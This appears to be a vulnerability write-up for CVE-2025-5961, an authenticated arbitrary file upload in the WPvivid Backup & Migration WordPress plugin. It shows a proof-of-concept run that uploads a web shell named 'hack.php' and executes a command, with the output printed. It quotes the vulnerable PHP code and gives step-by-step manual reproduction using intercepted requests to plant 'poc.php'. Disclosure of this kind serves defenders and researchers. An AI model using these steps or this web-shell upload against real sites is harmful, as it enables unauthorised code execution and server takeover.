# CVE-2025-5961
## Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload


The [wpvivid-backuprestore](https://wordpress.org/plugins/wpvivid-backuprestore/) plugin does not sanitize the file types of the `wpvivid_upload_import_files` action, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server. NOTE: Uploaded files are only accessible on WordPress instances running on the NGINX web server as the existing .htaccess within the target file upload folder prevents access on Apache servers.


## TL;DR Exploits
* A POC [CVE-2025-5961.py](./CVE-2025-5961.py) is provided to demonstrate an administrator uploading a web shell named `hack.php`.

```console
 python3 ./CVE-2025-5961.py https://lab1.hacker admin password
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
ajax_nonce: e4d4bec9f0
Uploading web shell: hack.php
{"result":"success"}

Web Shell At: https://lab1.hacker/wp-content/wpvividbackups/ImportandExport/hack.php

Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 78309sec preferred_lft 78309sec
    inet6 fd00::a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86105sec preferred_lft 14105sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:63:2d:a4:f2 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>
```

## Details  
The `wpvivid_upload_import_files` action calls the `upload_files` function on line [2210](https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/trunk/includes/class-wpvivid-export-import.php#L2210) of `/wp-content/plugins/wpvivid-backuprestore/includes/class-wpvivid-export-import.php` without enforcing any file type validation. 

Line [2235](https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/trunk/includes/class-wpvivid-export-import.php#L2235) `$file_name` is set as follows:

```php
$file_name=basename(sanitize_text_field($_POST['name']));
```

The `$file_name` variable is then used on line [2246](https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/trunk/includes/class-wpvivid-export-import.php#L2246)  to write the file to the file system.

```php
$file_handle = fopen($path.$file_name, 'wb');
```

## Manual Reproduction
0. Create a malicious file to pass the front-end validation since we're doing this manually. Enter this into the terminal:
```bash
echo "<?php phpinfo(); ?>" >>  wpvivid-0000000000000_1969-04-20-00-00_export_post.zip
```
1. Login to the admin panel and navigate to the `WPvivid Backup` tab.
2. Select `Export & Import` option from the side menu, and then select the `Import` tab.
3. Start up Burp Suite or a similar tool and begin intercepting the traffic. 
4. Click the `Upload and Import` button, and select the `wpvivid-0000000000000_1969-04-20-00-00_export_post.zip` we created in step zero.
![test1](./images/1.png)
5. The first `POST` request will contain something like the following, forward this request along:
```
POST /wp-admin/admin-ajax.php HTTP/2
...
...
...
action=wpvivid_check_import_file&file_name=wpvivid-0000000000000_1969-04-20-00-00_export_post.zip&nonce=5c83c6b97b
```
6. Modify the next request containing the form data to set the file name to `poc.php`: 
![test2](./images/2.png)
7. Naviage to `https://THEWEBSITE.com/wp-content/wpvividbackups/ImportandExport/poc.php` to execute the proof of concept.
![test3](./images/3.png)
